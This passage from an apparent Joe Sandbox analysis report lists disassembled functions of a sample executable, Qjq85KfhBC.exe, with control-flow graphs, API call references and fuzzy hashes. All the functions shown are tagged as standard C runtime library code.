                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                        • Opcode ID: 3064f378e191508d15e1222391363602e1e6ead65f0f06fb690ea4b78ca2667c
                                                                                                                                                                                                                                                        • Instruction ID: 00f0cfc4ee4f1d7017279974d6159bbe51ed5b49ff837a105a8fd3cfbfbaf8a1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3064f378e191508d15e1222391363602e1e6ead65f0f06fb690ea4b78ca2667c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E601DF3235D3AD5FA62437B8BC85AEB2758EB557F4720423AF520810F4EF114CF2A240
                                                                                                                                                                                                                                                        Function 00914424 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 366 914424-914438 GetLastError 367 914446-91444b 366->367 368 91443a-914444 call 915904 366->368 370 91444d call 91480c 367->370 368->367 373 91448f-91449a SetLastError 368->373 372 914452-914458 370->372 374 914463-914471 call 91595a 372->374 375 91445a 372->375 381 914473-914474 374->381 382 914476-91448d call 914296 call 914869 374->382 377 91445b-914461 call 914869 375->377 383 91449b-9144a7 SetLastError call 913f24 377->383 381->377 382->373 382->383
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(00000008,?,00916D69,?,?,?,009204C8,0000002C,00913F34,00000016,0091209F,00911AFC), ref: 00914428
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091445B
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914483
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 00914490
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 0091449C
                                                                                                                                                                                                                                                        • _abort.LIBCMT ref: 009144A2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3160817290-0
                                                                                                                                                                                                                                                        • Opcode ID: 10e1f9d7f5aefad70512c660316f6baa870f8eca59613309dd3f1b2e7fb06177
                                                                                                                                                                                                                                                        • Instruction ID: 44c4c86dad740d100871d1a504a9cbac3ce48889c7bf51b3926f16f3a91faf49
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 10e1f9d7f5aefad70512c660316f6baa870f8eca59613309dd3f1b2e7fb06177
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 84F02832714648A7C622B735AC09FEB22AE9BCD7B1B258414F52CD61E5EF2488C29121
                                                                                                                                                                                                                                                        Function 009136FC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 390 9136fc-913724 GetModuleHandleExW 391 913726-913739 GetProcAddress 390->391 392 913749-91374d 390->392 393 913748 391->393 394 91373b-913746 391->394 395 913758-913765 call 91123a 392->395 396 91374f-913752 FreeLibrary 392->396 393->392 394->393 396->395
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009136AD,?,?,0091364D,?,009202E0,0000000C,009137A4,?,00000002), ref: 0091371C
                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0091372F
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,009136AD,?,?,0091364D,?,009202E0,0000000C,009137A4,?,00000002,00000000), ref: 00913752
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                        • Opcode ID: 2729059067ceca4ff43df6a5853131d835bec7b539b25b6a19cf585189a090e4
                                                                                                                                                                                                                                                        • Instruction ID: f27865366467ad0b67b9edf3e7ececa1bb9b636b95cce120bc66288bc36b4b4f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2729059067ceca4ff43df6a5853131d835bec7b539b25b6a19cf585189a090e4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FDF04F74B5420CBBCB159BA0DC49BEEBFB9EF48756F0080A4F905A21A0DB305A85DA90
                                                                                                                                                                                                                                                        Function 0091634D Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 400 91634d-916372 call 913f72 403 916374-91637c 400->403 404 91637f-9163a5 MultiByteToWideChar 400->404 403->404 405 916444-916448 404->405 406 9163ab-9163b7 404->406 409 916454-916469 call 91123a 405->409 410 91644a-91644d 405->410 407 916403 406->407 408 9163b9-9163ca 406->408 411 916405-916407 407->411 412 9163e5-9163eb 408->412 413 9163cc-9163db call 91ac20 408->413 410->409 415 916409-91642b call 9120b0 MultiByteToWideChar 411->415 416 91643d-916443 call 91646a 411->416 418 9163ec call 9162ff 412->418 413->416 426 9163dd-9163e3 413->426 415->416 428 91642d-91643b GetStringTypeW 415->428 416->405 423 9163f1-9163f6 418->423 423->416 427 9163f8 423->427 429 9163fe-916401 426->429 427->429 428->416 429->411
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,009154C8,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 0091639A
                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 009163D2
                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00916423
                                                                                                                                                                                                                                                        • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00916435
                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 0091643E
                                                                                                                                                                                                                                                          • Part of subcall function 009162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00917E5B,?,00000000,?,0091686F,?,00000004,00000000,?,?,?,00913BCD), ref: 00916331
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1857427562-0
                                                                                                                                                                                                                                                        • Opcode ID: 2eb83c7704344494ee6aea1cbb9bfbd8feab7e7597dbdec42e685764f4b9c753
                                                                                                                                                                                                                                                        • Instruction ID: 07e2b1e22f3ada05ab58db210015cb2e87138bd29242111095fcf2169fef7ae1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2eb83c7704344494ee6aea1cbb9bfbd8feab7e7597dbdec42e685764f4b9c753
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4F31AB72B0021AABDB259F64DC85EEE7BAAEB44710B044169FC14D62A0E735CD91CBA0
                                                                                                                                                                                                                                                        Function 0091561E Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 430 91561e-915633 GetEnvironmentStringsW 431 915635-915655 call 9155e7 WideCharToMultiByte 430->431 432 91568b 430->432 431->432 438 915657 431->438 434 91568d-91568f 432->434 436 915691-915692 FreeEnvironmentStringsW 434->436 437 915698-9156a0 434->437 436->437 439 915658 call 9162ff 438->439 440 91565d-915662 439->440 441 915680 440->441 442 915664-915678 WideCharToMultiByte 440->442 444 915682-915689 call 914869 441->444 442->441 443 91567a-91567e 442->443 443->444 444->434
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetEnvironmentStringsW.KERNEL32 ref: 00915627
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0091564A
                                                                                                                                                                                                                                                          • Part of subcall function 009162FF: HeapAlloc.KERNEL32(00000000,?,00000004,?,00917E5B,?,00000000,?,0091686F,?,00000004,00000000,?,?,?,00913BCD), ref: 00916331
                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00915670
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00915683
                                                                                                                                                                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00915692
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocFreeHeap_free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2278895681-0
                                                                                                                                                                                                                                                        • Opcode ID: f5a6b54e7282e87588c9cc7d398b6c263d70fc67416b047388527084d607db58
                                                                                                                                                                                                                                                        • Instruction ID: 4702faa16a680f60b2d621098a57ceccc9acb554e55a0081a81ba7c365aeb1a4
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5a6b54e7282e87588c9cc7d398b6c263d70fc67416b047388527084d607db58
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5B01DF72706B1DBF27211AAA5C8CDFB6A6EDECABE43570129F914C3100EB608C41D1F0
                                                                                                                                                                                                                                                        Function 009144A8 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 447 9144a8-9144bf GetLastError 448 9144c1-9144cb call 915904 447->448 449 9144cd-9144d2 447->449 448->449 456 91451e-914525 SetLastError 448->456 450 9144d4 call 91480c 449->450 452 9144d9-9144df 450->452 454 9144e1 452->454 455 9144ea-9144f8 call 91595a 452->455 458 9144e2-9144e8 call 914869 454->458 463 9144fa-9144fb 455->463 464 9144fd-914513 call 914296 call 914869 455->464 457 914527-91452c 456->457 465 914515-91451c SetLastError 458->465 463->458 464->456 464->465 465->457
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,009147FE,00917E79,?,0091686F,?,00000004,00000000,?,?,?,00913BCD,?,00000000), ref: 009144AD
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009144E2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00914509
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00914516
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 0091451F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                        • Opcode ID: d1c38b458259419563b7a32e70cf2e268f5a03f473a97b26a1b9e2fa054b4a33
                                                                                                                                                                                                                                                        • Instruction ID: 23a5d895949e1e32e2fc93c6b913c22bbca8e06b7e9e9e3e5a65cf5e0eb8fab0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d1c38b458259419563b7a32e70cf2e268f5a03f473a97b26a1b9e2fa054b4a33
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5001287635460CAB932267346C45FEB226FABDDB757214025F42AE21D2EF748DC2A020
                                                                                                                                                                                                                                                        Function 00916176 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 470 916176-916181 471 916183-91618b 470->471 472 9161dc-9161de 470->472 473 916194-91619d 471->473 474 91618d-916193 call 914869 471->474 476 9161a6-9161af 473->476 477 91619f-9161a5 call 914869 473->477 474->473 478 9161b1-9161b7 call 914869 476->478 479 9161b8-9161c1 476->479 477->476 478->479 483 9161c3-9161c9 call 914869 479->483 484 9161ca-9161d3 479->484 483->484 484->472 488 9161d5-9161db call 914869 484->488 488->472
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091618E
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009161A0
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009161B2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009161C4
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 009161D6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: 40a1aa1192f0940d8bfc2259fa1ca8920a848375507234344ac357af92867048
                                                                                                                                                                                                                                                        • Instruction ID: 88a7065229395af6e190785dbc80c69e81d5988031d64120b079dfd69db6ccd9
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40a1aa1192f0940d8bfc2259fa1ca8920a848375507234344ac357af92867048
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DCF06232B1C258BF8670EB55F985DDA77EDAA94B103980855F409DB552C730FCC08650
                                                                                                                                                                                                                                                        Function 00913D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DAD
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: HeapFree.KERNEL32(00000000,00000000,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?), ref: 0091487F
                                                                                                                                                                                                                                                          • Part of subcall function 00914869: GetLastError.KERNEL32(?,?,0091620D,?,00000000,?,00000000,?,00916234,?,00000007,?,?,0091669F,?,?), ref: 00914891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DBF
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DD2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DE3
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913DF4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: c735d6a193837ec70d503887693157a772a81c7a728b1e7aa1a08931045fa94f
                                                                                                                                                                                                                                                        • Instruction ID: 82ed4229938e13c2155aef260cd47a2f027d851fcf72ad13b669bb05dbc9001f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c735d6a193837ec70d503887693157a772a81c7a728b1e7aa1a08931045fa94f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52F0307852C264EFC7716F15FC019C53B64A7A871038002A6F4015A2F5C73505A3EBC0
                                                                                                                                                                                                                                                        Function 00912F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\Qjq85KfhBC.exe,00000104), ref: 00912F93
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 0091305E
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00913068
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\Qjq85KfhBC.exe
                                                                                                                                                                                                                                                        • API String ID: 2506810119-2502770840
                                                                                                                                                                                                                                                        • Opcode ID: 3281da98408dd1b6e147e9082b68bc3d6a4bf8a101bc6b7bf5ec6be1ec6eabd0
                                                                                                                                                                                                                                                        • Instruction ID: d1209c4735acc12e09500702fd40434d17912a2eb90cdbfda1ac6bbc9a6b3b90
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3281da98408dd1b6e147e9082b68bc3d6a4bf8a101bc6b7bf5ec6be1ec6eabd0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30315C71B0425CEFDB21AF999881AEEBBFCEB89710F108066E4049B251D6718A85DB91
                                                                                                                                                                                                                                                        Function 009125E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00912594,00000000,?,00921B50,?,?,?,00912737,00000004,InitializeCriticalSectionEx,0091BC48,InitializeCriticalSectionEx), ref: 009125F0
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00912594,00000000,?,00921B50,?,?,?,00912737,00000004,InitializeCriticalSectionEx,0091BC48,InitializeCriticalSectionEx,00000000,?,009124C7), ref: 009125FA
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00912622
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_910000_Qjq85KfhBC.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                        • Opcode ID: 1886a43940c7ec42d0122a4b92c2d031f14ae1968af00cbbb6921456a6dad82a
                                                                                                                                                                                                                                                        • Instruction ID: 201a430c612b6d21b111d7cdb580bfa33ebed117cf663ec60fd84d844349b3dd
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1886a43940c7ec42d0122a4b92c2d031f14ae1968af00cbbb6921456a6dad82a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C1E0483178430CBBDF112B71EC06FD93F59AB18B91F104421F90DE40E5E7A1DAA4D544
                                                                                                                                                                                                                                                        Function 009157DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00915784,00000000,00000000,00000000,00000000,?,00915981,00000006,FlsSetValue), ref: 0091580F
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00915784,00000000,00000000,00000000,00000000,?,00915981,00000006,FlsSetValue,0091C4D8,FlsSetValue,00000000,00000364,?,009144F6), ref: 0091581B
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00915784,00000000,00000000,00000000,00000000,?,00915981,00000006,FlsSetValue,0091C4D8,FlsSetValue,00000000), ref: 00915829
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1445047200.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445008668.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445078821.000000000091B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445103591.0000000000921000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1445125613.0000000000923000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
